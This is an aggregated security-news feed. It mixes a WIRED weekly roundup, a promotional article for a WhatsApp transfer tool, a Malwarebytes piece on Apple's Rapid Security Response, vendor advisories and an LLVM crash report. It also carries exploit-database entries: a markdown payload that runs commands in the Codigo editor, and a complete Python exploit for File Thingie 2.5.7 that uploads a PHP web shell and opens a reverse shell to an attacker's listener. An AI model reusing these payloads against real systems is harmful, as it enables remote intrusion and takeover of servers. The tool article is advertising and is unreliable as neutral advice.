Plus: Apple and Google plan to stop AirTag stalking, Meta violated the FTC’s privacy order, and how to tell if your car is tracking you.

In December 2020, security giant Mandiant revealed it had been hacked. Its disclosure was the first public sign of the SolarWinds hack, a Russian-orchestrated supply chain attack that's widely regarded as one of the biggest espionage hacks ever. Among its victims were the US Departments of Homeland Security, Energy, and Justice. This blow-by-blow retelling of the historic SolarWinds attack, from Kim Zetter, charts the ways the hackers pulled off the attack—and how they were eventually caught.

Anti-abortion group the American College of Pediatricians (ACPeds) suffered a significant data breach this week. The doctors' organization, which sued the US government to ban the abortion drug mifepristone, left an unsecured Google Drive on its website, exposing a decade's worth of email exchanges, financial and tax records, and more sensitive data. The details give an unprecedented view of the organization, which has been described as a “hate group” for its views on LGBTQ people.  While ACPeds—which is not a school at all—characterizes itself as a “scientific organization,” leaked records show its deeply evangelical Christian mission.

Security experts have promised a future where passwords will cease to exist for the best part of a decade. However, that reality took a big step forward this week—really!—as Google launched passkey logins for billions of people. The technique uses cryptographic keys that are stored on your devices to replace your old, insecure passwords.

Elsewhere, cops in the US, Europe, and nine other countries have arrested 288 people for their involvement in the dark web drug markets, including the site Monopoly Market, which was quietly taken offline in 2021. Facebook owner Meta has added new tools to its business accounts in an attempt to thwart bad actors abusing them, including who can become account administrators and access lines of credit.

But that’s not all. Each week, we round up the news we didn’t report in-depth ourselves. Click on the headlines to read the full stories. And stay safe out there.

Russian ships with underwater operations equipment have been identified as being near the sites of the Nord Stream gas pipeline explosions in the days before the blasts, according to a joint investigation from national broadcasters in Denmark, Norway, Sweden, and Finland. Journalists at the publications combined intercepted radio broadcasts from the ships with satellite images to pinpoint their locations and track their paths. It is the latest example of investigators piecing together different sources of data, from varying unconnected sources, to reveal new details about real-world events.

Three ships, according to the investigation, sailed from naval bases in Russia to near the blast sites in June and September 2022. All of the ships had turned off their location tracking AIS services, an act often described as “going dark” and commonly used for disguising activity. Among the vessels were the navy research ship Sibiryakov and a tugboat called SB-123, which is said to be capable of launching mini-submarines. (In November 2022, WIRED reported on the presence of “ghost ships” around the time of the explosions, but had no information on their identity.)

Separately, another Russian vessel, the SS-750, was near the pipelines four days before they were blown up. In response to a public records request, the Danish Defense Command confirmed to the Information, a Danish news site, that it had 26 photos of the SS-750 near the sites.

Since the explosions at the Nord Stream 1 and 2 pipelines in September, there has been no official confirmation, with supporting evidence, of who may have been behind the blasts. The investigation from the Nordic journalists says the ships’ behavior was unusual but does not conclude what they were doing near the Nord Stream sites. Russia has denied being involved in the attacks, pointing fingers at both the UK and US. Other reports have claimed a pro-Ukranian group may have conducted the attack, which Ukraine has denied. Official investigations into the blasts are still ongoing in multiple European countries and the exact cause of the explosions is still unclear.

The US Federal Trade Commission is planning to impose a “blanket ban” on Meta and its companies—Instagram, Messenger, Facebook, WhatsApp, and VR firm Horizon Worlds—from making money from the data of people under 18. This could potentially mean the company would not be able to use data from these users to show them targeted advertisements and could only use the information it collects for providing its services or security purposes. The FTC also says that Meta would not be able to start using data collected before people turned 18 for commercial purposes.

The proposal comes as the FTC alleged Meta hasn’t complied with a previous 2020 privacy order it agreed to as part of a $5 billion settlement. In a statement, the FTC says Meta has “misled parents about their ability to control with whom their children communicated through its Messenger Kids app, and misrepresented the access it provided some app developers to private user data.” The proposed changes would be a modification to the FTC’s previous order, and it says it may also limit how Meta uses face recognition technology and require it to provide extra protection for users. Mark Zuckerberg’s firm has 30 days to respond to the FTC, which then may alter its plans.

How do you know if you are being stalked with an AirTag? If you have an iPhone running a newish version of iOS, then you should receive push notifications if an AirTag that doesn’t belong to you is following you around. However, if you own an Android device, you have to go through the extra step of downloading an app to discover if you are being tracked—a high burden for people in potentially abusive situations. Apple and Google said this week they are now working together to create a common standard for all phones to detect Bluetooth trackers that are being used to stalk or harass people. The proposal is also backed by Samsung and Bluetooth tracker manufacturers. The plan comes years after Apple’s cheap devices were first released without the additional privacy protections Apple added after the AirTags launch.

In 2017, the NotPetya cyberattack—the most devastating in history—caused more than $10 billion in damage to the companies and organizations it impacted. Among them was pharmaceutical giant Merck, which lost hundreds of millions of dollars as a result of the malware. This week, a New Jersey court ruled that Merck's insurers have to cover losses from the cyberattack. The insurers had argued the use of the malware, which has been linked to Russia, should be considered a warlike act and, as a result, would not fall under insurance policies.

The judges didn't agree. “The exclusion of damages caused by hostile or warlike action by a government or sovereign power in times of war or peace requires the involvement of military action,” they wrote in a decision. “Coverage could only be excluded here if we stretched the meaning of 'hostile' to its outer limit.” The decision comes as US president Joe Biden's administration looks to shift the liability for security issues to companies that are impacted.

Whether you know it or not, your car is a data goldmine. Within a few minutes, it is possible to "fingerprint" you based on the data your vehicle collects. Some consider the amount of data that vehicles grab a national security threat. A new free tool, from vehicle privacy company Privacy4Cars, aims to reveal how much data your car and its manufacturer can collect about you. Entering your vehicle identification number (VIN) into the tool will tell you whether your car collects "identifiers, location data, biometrics, and data synced from mobile phones," as well as what data manufacturers sell to third parties, such as data brokers.

Russian ‘Ghost Ships’ Identified Near the Nord Stream Blasts

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between April 28 and May 5. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for April 28 to May 5

By ghostadmin
When you transfer data from an Android to an iOS device, the Move to an iOS app is…
This is a post from HackRead.com Read the original post: Transferring WhatsApp Data Between Android and iPhone [2023]

When you transfer data from an Android to an iOS device, the Move to an iOS app is the go-to solution for any mobile user. However, many users have complained that this app doesn’t work at the final step when importing backup. Or some data is not completely transferred. So is there an alternative to the Move to iOS app that is safe, secure, and capable of doing the job?

IToolab WatsGo fits the description of a worthy solution pretty well. We have discussed its features and working, too. 

So stay tuned as this article explains the two best and proven methods to transfer WhatsApp from Android to iPhone simply and seamlessly. Be in for a thoughtful read ahead. 

****2 efficient Methods to Transfer WhatsApp between Android and iPhone****

Multiple ways are there to transfer WhatsApp from Android to iPhone**.** Here we have discussed the two practical ways, Move to iOS and iToolab WatsGo, to help you transfer data from Android to iPhone in minutes.

****Method 1: Use iToolab WatsGo to Transfer WhatsApp from Android to iPhone without factory resetting your iPhone****

iToolab WatsGo – WhatsApp Transfer, Backup & Restore is the best-proven solution to quickly transfer WhatsApp from Android to iPhone and other iOS devices with just one click. Besides messages, you can export and migrate multiple data types like audio, videos, images, contacts, label messages, etc., without hassle. 

The program easily transfers GBWhatsApp to WhatsApp/GBWhatsApp and even backups and restores GBWhatsApp, and is compatible with all iOS, including iPhone 16, Android devices, including 12/13, and over 6000 Android models. 

****Prime Features of iToolab WatsGo****

*   **1\. Features multidirectional transfer:** iToolab features multidirectional transfers from Android to iPhone, iPhone to Android, Android to Android, and iPhone to iPhone.
*   **2\. Does not require iPhone factory reset:** With iToolab WatsGo, you don’t need to factory reset your iPhone; instead, its cutting-edge inbuilt tech has a high success rate of up to 90%.
*   **3\. Fast Transfer Speed:** Compared to any program, iToolab WatsGo has a 3x faster transfer speed. Instead, it has a powerful transfer speed of 10240 kb/s compared to Move to iOS. 
*   **4\. Smooth Transfer:** This program transfers extensive data of up to 20GB without sudden Interruption and exports 40k messages simultaneously.
*   **5\. Supports 6000+ Android devices:** iToolab supports over 6k Android models, including Huawei, OnePlus, and Xiaomi.
*   **6\. Supports transferring over 20 data types:** The program transfers images, audio, videos, call history, contacts, docs, links, stickers, status, messages, wallpaper, etc.
*   **7\. High compatibility:** iToolab WatsGo is fully compatible with the latest iPhone 14 series, iOS 16, and Android 13.

****Steps to Use iToolab WatsGo****

**Step 1: Download and open iToolab WatsGo**

Download and install iToolab WatsGo from its official link and click WhatsApp in the left panel. Then click **WhatsApp Transfer.** 

Remember to enable USB debugging on Android and tap **Trust** on iPhone so iToolab WatsGo recognizes them easily.  

**Step 2: Connect your Android and iPhone** 

Connect your Android (source device) and iPhone (target device) with the PC. Then click the arrow to flip both devices and adjust them. 

Once the connection is established, the tool reminds you that your iPhone will be overwritten, so you must back it up in case of losing your essential data. 

You must select the WhatsApp data and media files to be transferred to the iPhone, but text messages are shared by default. 

**Step 3: Turn on end-to-end encrypted WhatsApp Backup** 

Enable end-to-end encrypted WhatsApp Backup on your Android phone and follow the prompts (on-screen instructions) to backup. Or simply click the Kebab menu (three vertical dots) at the upper right > **Settings** \> **Chats** \> **Chat Backup.** Ensure to take a screenshot to save the password.

**Step 4: Verify with Password** 

Once the WhatsApp backup is generated, verify the 64-bit encrypted backup with a password. If you cannot verify the encrypted backup, click **Phone Number Verification** under the **Verify** button and continue the transfer process. 

*   Backup WhatsApp manually and turn off the encrypted backup
*   Verify the phone number (earlier used for backup)

**Step 5: Generate WhatsApp backup to restore**

Now the Android WhatsApp backup will process and convert to the format applicable to iPhone and will begin to restore to your iPhone. Within a few moments, you’ll see the success interface indicating that WhatsApp has transferred to the iPhone completely, and your iPhone will reboot again. 

**Pros** 

*   Does not compromise on data
*   Transfers data in a few clicks
*   Offers multidirectional and secure support
*   It doesn’t require jailbreak 
*   Compatible with Android 13 and iOS 16

**Cons**

*   The Mac version is unavailable 

****Other Useful Features of iToolab WatsGo****

Besides offering the ease of transferring WhatsApp from Android to iPhone**,** iToolab WatsGo delivers its services through many other valuable features.  

*   1\. iToolab WatsGo easily restores WhatsApp backup from Google Drive to iPhone.
*   2\. The program transfers GBWhatsApp to WhatsApp or GBWhatsApp/ WhatsApp Business in a simple way.
*   3\. iToolab lets you preview and restore WhatsApp or iTunes backup anytime you want.
*   4\. All the backups from the history list are displayed in the program. 
*   5\. iToolab WatsGo lets you back up WhatsApp on iOS and Android to a computer without iTunes, Google Drive, or iCloud. 

****Method 2: Use Move to iOS to Transfer WhatsApp from Android to iPhone** **

Move to iOS is an efficient tool from Apple that lets you quickly transfer multiple data, viz., message history, contacts, mail accounts, website bookmarks, photos, videos, and calendars, to iOS devices. The app comes in handy for a new iOS user. 

**Step 1:** Turn on your new/factory reset iPhone and keep it near the Android phone. Follow the setup instructions on the iPhone. 

**Step 2:** Look for the **Apps & Data** screen and click **Move Data from Android.** 

**Note:** You must erase your iOS device and start over if you have already finished setting up. But if you don’t want to erase it, you can transfer your WhatsApp data manually. 

**Step 3:** Launch and open the Move to iOS app on your Android device, then follow the instructions prompts on the screen. 

**Step 4:** Click **Continue** on your iPhone when you see the **Move from Android** screen. Then a six-digit/ten-digit code will display on your iPhone. Enter the prompt code on your Android phone.

**Step 5:** Your iPhone will create a temporary WiFi network. Click **Connect** to join it on your Android phone when asked, and wait for the **Transfer Data Screen** to appear. 

**Step 6:** Select your content on Android to transfer and click **Continue.**

**Step 7:** Keep both phones nearby and plug them into a power source until the data transfer is completed. The transfer time depends on your chosen content.

**Step 8:** Once the loading bar finishes on your iPhone, click **Done** on Android. Click **Continue** on your iPhone and follow the screen prompts to set it up. 

**Step 9:** Ensure all your selected WhatsApp content is transferred. You can manually move music, books, and PDF files. 

**Pros**

*   Transfers all your account information from Android to iOS devices over WiFi
*   Perfect solution for beginners 
*   Identifies Android apps and downloads on iPhone (if they are free)

**Cons**

*   Your iPhone must be new or factory reset.
*   Connect your Android and iPhones to the same WiFi and a power source. 
*   Ensure to use the same mobile number on both devices. 
*   You must have Android 5 or above, iOS 15.5, and newer versions to use the Move to iOS app.
*   Ensure installing Whatsapp iOS version 2.22.10.70 or above on iPhone and WhatsApp Android version 2.22.7.74 for Android phones. 

****The Bottom Line** **

As a new iOS user, transferring WhatsApp to your iOS device can be challenging, especially if you don’t follow the apt solutions. But we have discussed the two efficient and practical methods to transfer WhatsApp from Android to iPhone simply.

While Move to iOS is an excellent method, its cons are enough to seek an excellent alternative. So you can try iToolab WatsGo WhatsApp Transfer to transfer, back, and restore your WhatsApp data cleanly and simply.

1.  How to Transfer Data from Android to iPhone
2.  How to Create and Manage Groups on iPhone
3.  Transferring data between smartphones seamlessly
4.  How to Transfer Dropbox to Google Drive Fast & Easy
5.  How to Transfer Data between iPhone & Computer Safely

Transferring WhatsApp Data Between Android and iPhone [2023]

Categories: Apple
Categories: News
Tags: macOS

Tags:  iOS

Tags:  iPadOS

Tags:  Rapid Security Response

Tags:  RSR

After announcing Rapid Security Response (RSR) last year, Apple has finally released the first RSR patches to the public.



(Read more...)




The post Apple releases first Rapid Security Response update for iOS, iPadOS, and macOS users appeared first on Malwarebytes Labs.

On Monday, Apple released its first batch of Rapid Security Response (RSR) patches, **iOS 16.4.1 (a)**, **iPadOS 16.4.1 (a)**, and **macOS 13.3.1 (a)**, for iPhone and iPad, and macOS devices, respectively.

RSR is a new type of software patch delivered between Apple's regular, scheduled software updates. Previously, Apple security fixes came bundled along with features and improvements, but RSRs only carry security fixes. They're meant to make the deployment of security improvements faster and more frequent. According to an Apple notice about RSRs, the new updates "may also be used to mitigate some security issues more quickly, such as issues that might have been exploited or reported to exist 'in the wild'."

Think of it as the company's version of Microsoft's out-of-band (OOB) patches.

"When a Rapid Security Response has been applied, a letter appears after the software version number, as in this example: macOS 13.3.1 (a)," the notice said, giving users a glimpse of how RSR versioning works.

Apple introduced Rapid Security Response updates with the launch of iOS 16, iPadOS 16, and macOS Ventura at its Worldwide Developers Conference last summer. Devices allow automatic RSR patching by default, but the company provided its users with the option to disable it. You can visit this Apple Support page to learn how you can do this on iPhone, iPad, and Mac.

If you _do_ disable RSR, you will still receive security fixes as part of Apple's regular software updates, just as you did previously. However, not getting a quick fix when it's available could leave your device vulnerable to in-the-wild exploits.

Apple began testing RSR last year, with its beta testers. Monday's patches were the first to be released to the public. Some users reported they couldn't install the updates, even when devices successfully downloaded the patches, but that problem seems to have been resovled now, according to The Verge.

The company also didn't make clear what security fixes RSR for iOS, iPadOS, and macOS addressed, since there were no notes released for them. Moving forward, Apple will only make RSR available to all devices running the latest version of iOS, iPadOS, and macOS.

RSRs aren't the only recent innovation that should make it harder for criminals to exploit Apple devices. On April 21, we reported on Citizen Lab's investigation into the effectiveness of Apple's Lockdown Mode, a feature designed to provide a safer environment for users at a higher risk from targeted attacks, such as those developed by NSO Group, the company behind the notorious spyware Pegasus, and QuaDream. NSO Group is known to take advantage of 0-day vulnerabilities. RSRs should improve protection further by allowing Apple to patch those 0-days immediately after they're discovered.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Apple releases first Rapid Security Response update for iOS, iPadOS, and macOS users

Codigo Markdown Editor version 1.0.1 suffers from an arbitrary code execution vulnerability.

# Exploit Title: Codigo Markdown Editor v1.0.1 (Electron) - Arbitrary Code Execution  
# Date: 2023-05-03  
# Exploit Author: 8bitsec  
# Vendor Homepage: https://alfonzm.github.io/codigo/  
# Software Link: https://github.com/alfonzm/codigo-app  
# Version: 1.0.1  
# Tested on: [Mac OS 13]

Release Date:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D  
2023-05-03

Product & Service Introduction:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D  
A Markdown editor & notes app made with Vue & Electron

Technical Details & Description:  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=  
=3D=3D=3D=3D=3D=3D=3D

A vulnerability was discovered on Codigo markdown editor v1.0.1 allowing a =  
user to execute arbitrary code by opening a specially crafted file.

Proof of Concept (PoC):  
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

Arbitrary code execution:

Create a markdown file (.md) in any text editor and write the following pay=  
load:  
<video><source onerror=3D"alert(require('child_process').execSync('/System/=  
Applications/Calculator.app/Contents/MacOS/Calculator').toString());">

Opening the file in Codigo will auto execute the Calculator application.

Codigo Markdown Editor 1.0.1 Code Execution

Red Hat Security Advisory 2023-2137-01 - Samba is an open-source implementation of the Server Message Block protocol and the related Common Internet File System protocol, which allow PC-compatible machines to share files, printers, and various information.

Red Hat Security Advisory 2023-2137-01

File Thingie version 2.5.7 remote shell upload exploit. This exploit is based on the vulnerability priorly discovered by Cakes in September of 2019.

    #!/usr/bin/python# Exploit Title: File Thingie 2.5.7 - Remote Code Execution (RCE)# Google Dork: N/A# Date: 27th of April, 2023# Exploit Author: Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)# Software Link: https://github.com/leefish/filethingie# Version: 2.5.7# Tested on: N/A# CVE: N/A# Vulnerability originally discovered / published by Cakes# Reference: https://www.exploit-db.com/exploits/47349# Run a local listener on your machine and youre good to goimport osimport argparseimport requestsimport randomimport stringimport zipfilefrom urllib.parse import urlsplit, urlunsplit, quoteclass Exploit:    def __init__(self, target, username, password, lhost, lport):        self.target = target        self.username = username        self.password = password        self.lhost = lhost        self.lport = lport    def try_login(self) -> bool:        self.session = requests.Session()        post_body = {"ft_user": f"{self.username}", "ft_pass": f"{self.password}", "act": "dologin"}        response = self.session.post(self.target, data=post_body)        if response.status_code == 404:            print(f"[-] 404 Not Found - The requested resource {self.target} was not found")            return False        elif response.status_code == 200:            if "Invalid username or password" in response.text:                print(f"Invalid username or password")                return False            return True            def create_new_folder(self) -> bool:        # Generate random string        letters = string.ascii_letters        self.payload_filename = "".join(random.choice(letters) for i in range(16))        headers = {"Content-Type": "application/x-www-form-urlencoded"}        post_body = {f"type": "folder", "newdir": f"{self.payload_filename}", "act": "createdir", "dir": "", "submit" :"Ok"}        print(f"[*] Creating new folder /{self.payload_filename}")        response = self.session.post(self.target, headers=headers, data=post_body)        if f"index.php?dir=/{self.payload_filename}" in response.text:            print(f"[+] Created new folder /{self.payload_filename}")            return True                else:            print(f"[-] Could not create new folder /{self.payload_filename}")            return False    def create_payload(self) -> bool:        try:            with zipfile.ZipFile(f"{self.payload_filename}.zip", 'w', compression=zipfile.ZIP_DEFLATED) as zip_file:                    zip_file.writestr(f"{self.payload_filename}.php", "<?php if(isset($_REQUEST[\'cmd\'])){ echo \"<pre>\"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo \"</pre>\"; die; }?>")                    print(f"[+] Zipped payload to {self.payload_filename}.zip")                    return True        except:            print(f"[-] Could not create payload to {self.payload_filename}.zip")            return False    def upload_payload(self) -> bool:        # Set up the HTTP headers and data for the request        headers = {            b'Content-Type': b'multipart/form-data; boundary=---------------------------grimlockx'        }        post_body = (            '-----------------------------grimlockx\r\n'            'Content-Disposition: form-data; name="localfile-1682513975953"; filename=""\r\n'            'Content-Type: application/octet-stream\r\n\r\n'        )        post_body += (            '\r\n-----------------------------grimlockx\r\n'            'Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n'            '2000000\r\n'            '-----------------------------grimlockx\r\n'            f'Content-Disposition: form-data; name="localfile"; filename="{self.payload_filename}.zip"\r\n'            'Content-Type: application/zip\r\n\r\n'        )        # Read the zip file contents and append them to the data        with open(f"{self.payload_filename}.zip", "rb") as f:            post_body += ''.join(map(chr, f.read()))        post_body += (            '\r\n-----------------------------grimlockx\r\n'            'Content-Disposition: form-data; name="act"\r\n\r\n'            'upload\r\n'            '-----------------------------grimlockx\r\n'            'Content-Disposition: form-data; name="dir"\r\n\r\n'            f'/{self.payload_filename}\r\n'            '-----------------------------grimlockx\r\n'            'Content-Disposition: form-data; name="submit"\r\n\r\n'            'Upload\r\n'            '-----------------------------grimlockx--\r\n'        )        print("[*] Uploading payload to the target")        response = self.session.post(self.target, headers=headers, data=post_body)        if f"<a href=\"./{self.payload_filename}/{self.payload_filename}.zip\" title=\"Show {self.payload_filename}.zip\">{self.payload_filename}.zip</a>" in response.text:            print("[+] Uploading payload successful")            return True        else:             print("[-] Uploading payload failed")            return False            def get_base_url(self) -> str:        url_parts = urlsplit(self.target)        path_parts = url_parts.path.split('/')        path_parts.pop()        base_url = urlunsplit((url_parts.scheme, url_parts.netloc, '/'.join(path_parts), "", ""))        return base_url    def unzip_payload(self) -> bool:        print("[*] Unzipping payload")        headers = {"Content-Type": "application/x-www-form-urlencoded"}        post_body = {"newvalue": f"{self.payload_filename}.zip", "file": f"{self.payload_filename}.zip", "dir": f"/{self.payload_filename}", "act": "unzip"}        response = self.session.post(f"{self.target}", headers=headers, data=post_body)                if f"<p class='ok'>{self.payload_filename}.zip unzipped.</p>" in response.text:            print("[+] Unzipping payload successful")            print(f"[+] You can now execute commands by opening {self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd=<command>")            return True        else:             print("[-] Unzipping payload failed")            return False    def execute_payload(self) -> bool:        print("[*] Trying the get a reverse shell")        cmd = quote(f"php -r \'$sock=fsockopen(\"{self.lhost}\",{self.lport});system(\"/bin/bash <&3 >&3 2>&3\");\'")        print("[*] Executing payload")        response = self.session.get(f"{self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd={cmd}")        print("[+] Exploit complete")                return True    def cleanup_local_files(self) -> bool:        if os.path.exists(f"{self.payload_filename}.zip"):            os.remove(f"{self.payload_filename}.zip")            print("[+] Cleaned up zipped payload on local machine")            return True                print("[-] Could not clean up zipped payload on local machine")        return Falseif __name__ == "__main__":    parser = argparse.ArgumentParser()    parser.add_argument("-t", "--target", dest="target", type=str, required=True, help="Target URL to ft2.php")    parser.add_argument("-u", "--username", dest="username", type=str, required=True, help="FileThingie username")    parser.add_argument("-p", "--password", dest="password", type=str, required=True, help="FileThingie password")    parser.add_argument("-L", "--LHOST", dest="lhost", type=str, required=True, help="Local listener ip")    parser.add_argument("-P", "-LPORT", dest="lport", type=int, required=True, help="Local listener port")    args = parser.parse_args()    exploit = Exploit(args.target, args.username, args.password, args.lhost, args.lport)    exploit.try_login()    exploit.create_new_folder()    exploit.create_payload()    exploit.upload_payload()    exploit.unzip_payload()    exploit.execute_payload()    exploit.cleanup_local_files()

File Thingie 2.5.7 Shell Upload

Red Hat Security Advisory 2023-2136-01 - Samba is an open-source implementation of the Server Message Block protocol and the related Common Internet File System protocol, which allow PC-compatible machines to share files, printers, and various information.

Red Hat Security Advisory 2023-2136-01

Apple Security Advisory 2023-05-03-1 - AirPods Firmware Update 5E133 and Beats Firmware Update 5B66 address bluetooth authentication vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-05-03-1 AirPods Firmware Update 5E133 andBeats Firmware Update 5B66AirPods Firmware Update 5E133 and Beats Firmware Update 5B66address the following issues. Information about the security contentis also available at https://support.apple.com/HT213752.AirPods Firmware Update 5E133Released April 11, 2023BluetoothAvailable for: AirPods (2nd generation and later), AirPod Pro (all models),AirPods MaxImpact: When your headphones are seeking a connection request to oneof your previously paired devices, an attacker in Bluetooth range might beable to spoof the intended source device and gain access to your headphones.Description: An authentication issue was addressed with improved statemanagement.CVE-2023-27964: Yun-hao Chung and Archie Pusaka of GoogleChromeOSFirmware updates are automatically delivered while your AirPods arecharging and in Bluetooth range of your iPhone, iPad, or Mac.Learn more about firmware updates for AirPods. Beats Firmware Update 5B66Released May 2, 2023BluetoothAvailable for: Powerbeats Pro, Beats Fit ProImpact: When your headphones are seeking a connection request to oneof your previously paired devices, an attacker in Bluetooth range might beable to spoof the intended source device and gain access to your headphones.Description: An authentication issue was addressed with improved statemanagement.CVE-2023-27964: Yun-hao Chung and Archie Pusaka of GoogleChromeOSIf you paired your Beats wireless headphones with your iPhone, iPad, orMac, your Beats will update automatically. Learn more about firmware updatesfor Beats. You can check the firmware version of your wireless headphones in Bluetoothsettings on your device. 1. On your iPhone or iPad, go to Settings > Bluetooth. On your Mac, go toSystem Settings > Bluetooth. 2. Tap on the info button next to your headphones.-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmRS94AACgkQ4RjMIDkeNxnu4g/+ORGK+ShjgE7mTdv7kmpBLzslblq6S9h/z3Q5GDcs9nyzxkXt3Q9/WRRdgUoPdGavnsIqfY5yU7qig1ybUQItEsGuEz4jF32gmXTuUMTUnAYHVSZYgmo/6tlT2Vvo08R+5fNWjBNxqEQMM0hQjzj3I37fsIEBR7CwGvzvsofrctRkfPuEi6q+yztMmM1LuVAixeHTy2J/GLXPA62WBUVdfooEAEIHQADHbXRgvvjALhIegyut4DY7BjJKSYo/n5U8NHxh/HjocgxATJUAUJU2ua2QrRWnzLA1n2HS9mJdm385FS3NZTRXfvTMMeAix7DAE82utWkweTIF5rmycjnQ8GHgqFSgtUWS9aMe7Hjj9872rDmIFwi2EQk0LtWAElhqF4yGkwa42+CKraa48XR1Ai9/QBNoeJPkNzRu7UZrrB5inYNaWP6nGX8XTS2rrxHDo1PFUYI7eEkqu5pq78LEQzyvnfx5scBwBXfc4dmkuzmn9+UbYlHLoKmni1w6mS8v0yXqCPXI+gG3dO3lmoshtPbqvaE+yTjLcG57rS61Dxol2Q00iL4ZvDbbYp/9c08W1SkVh4PCeKss3+CxBZ2/a4GBpESjkq7EdipRVkXC3TjN+ZvGMETXetBW102+c0gF49uBR+w+nouTRxK+boYBqPxAkhHsn7z6o31sCT2Op9s==AsH2-----END PGP SIGNATURE-----

Apple Security Advisory 2023-05-03-1

llvm-project commit a0138390 was discovered to contain a segmentation fault via the component mlir::Type::isa<mlir::LLVM::LLVMVoidType.

MLIR built at commit a0138390  
Reproduced with:  
mlir-opt --convert-spirv-to-llvm temp.mlir

temp.mlir:

module { 
  spirv.module Logical GLSL450 {
    spirv.GlobalVariable @var01\_scalar bind(0, 1) {aliased} : !spirv.ptr<!spirv.struct<(!spirv.rtarray<f32, stride\=4\> \[0\])>, StorageBuffer\>
    spirv.GlobalVariable @var01\_vec2 bind(0, 1) {aliased} : !spirv.ptr<!spirv.struct<(!spirv.rtarray<vector<2xf32\>, stride\=8\> \[0\])>, StorageBuffer\>
    spirv.GlobalVariable @var01\_vec4 bind(0, 1) {aliased} : !spirv.ptr<!spirv.struct<(!spirv.rtarray<vector<4xf32\>, stride\=16\> \[0\])>, StorageBuffer\>
  
    spirv.func @load\_different\_vector\_sizes(%i0: i32) -> vector<4xf32\> "None" {
      %c0 = spirv.Constant 0 : i32
  
      %addr0 = spirv.mlir.addressof @var01\_vec4 : !spirv.ptr<!spirv.struct<(!spirv.rtarray<vector<4xf32\>, stride\=16\> \[0\])>, StorageBuffer\>
      %ac0 = spirv.AccessChain %addr0\[%c0, %i0\] : !spirv.ptr<!spirv.struct<(!spirv.rtarray<vector<4xf32\>, stride\=16\> \[0\])>, StorageBuffer\>, i32, i32
      %vec4val = spirv.Load "StorageBuffer" %ac0 : vector<4xf32\>
  
      %addr1 = spirv.mlir.addressof @var01\_scalar : !spirv.ptr<!spirv.struct<(!spirv.rtarray<f32, stride\=4\> \[0\])>, StorageBuffer\>
      %ac1 = spirv.AccessChain %addr1\[%c0, %i0\] : !spirv.ptr<!spirv.struct<(!spirv.rtarray<f32, stride\=4\> \[0\])>, StorageBuffer\>, i32, i32
      %scalarval = spirv.Load "StorageBuffer" %ac1 : f32
  
      %val = spirv.CompositeInsert %scalarval, %vec4val\[0 : i32\] : f32 into vector<4xf32\>
      spirv.ReturnValue %val : vector<4xf32\>
    }
  }
  
  
}

trace:

PLEASE submit a bug report to https://github.com/llvm/llvm-project/issues/ and include the crash backtrace.
Stack dump:
0.	Program arguments: mlir-opt --convert-spirv-to-llvm temp.mlir
Stack dump without symbol names (ensure you have llvm-symbolizer in your PATH or set the environment var \`LLVM\_SYMBOLIZER\_PATH\` to point to it):
0  mlir-opt                 0x00000001023fc5bc llvm::sys::PrintStackTrace(llvm::raw\_ostream&, int) + 56
1  mlir-opt                 0x00000001023fb624 llvm::sys::RunSignalHandlers() + 112
2  mlir-opt                 0x00000001023fcc54 SignalHandler(int) + 344
3  libsystem\_platform.dylib 0x00000001a56894c4 \_sigtramp + 56
4  mlir-opt                 0x0000000102a8a668 bool mlir::Type::isa<mlir::LLVM::LLVMVoidType, mlir::LLVM::LLVMLabelType, mlir::LLVM::LLVMMetadataType, mlir::LLVM::LLVMFunctionType, mlir::LLVM::LLVMTokenType, mlir::LLVM::LLVMScalableVectorType>() const + 24
5  mlir-opt                 0x0000000102a8a668 bool mlir::Type::isa<mlir::LLVM::LLVMVoidType, mlir::LLVM::LLVMLabelType, mlir::LLVM::LLVMMetadataType, mlir::LLVM::LLVMFunctionType, mlir::LLVM::LLVMTokenType, mlir::LLVM::LLVMScalableVectorType>() const + 24
6  mlir-opt                 0x0000000102a8bef8 mlir::LLVM::LLVMStructType::verify(llvm::function\_ref<mlir::InFlightDiagnostic ()>, llvm::ArrayRef<mlir::Type>, bool) + 76
7  mlir-opt                 0x0000000102a8bcc8 mlir::LLVM::LLVMStructType mlir::detail::StorageUserBase<mlir::LLVM::LLVMStructType, mlir::Type, mlir::LLVM::detail::LLVMStructTypeStorage, mlir::detail::TypeUniquer, mlir::DataLayoutTypeInterface::Trait, mlir::SubElementTypeInterface::Trait, mlir::TypeTrait::IsMutable>::get<llvm::ArrayRef<mlir::Type>, bool>(mlir::MLIRContext\*, llvm::ArrayRef<mlir::Type>, bool) + 76
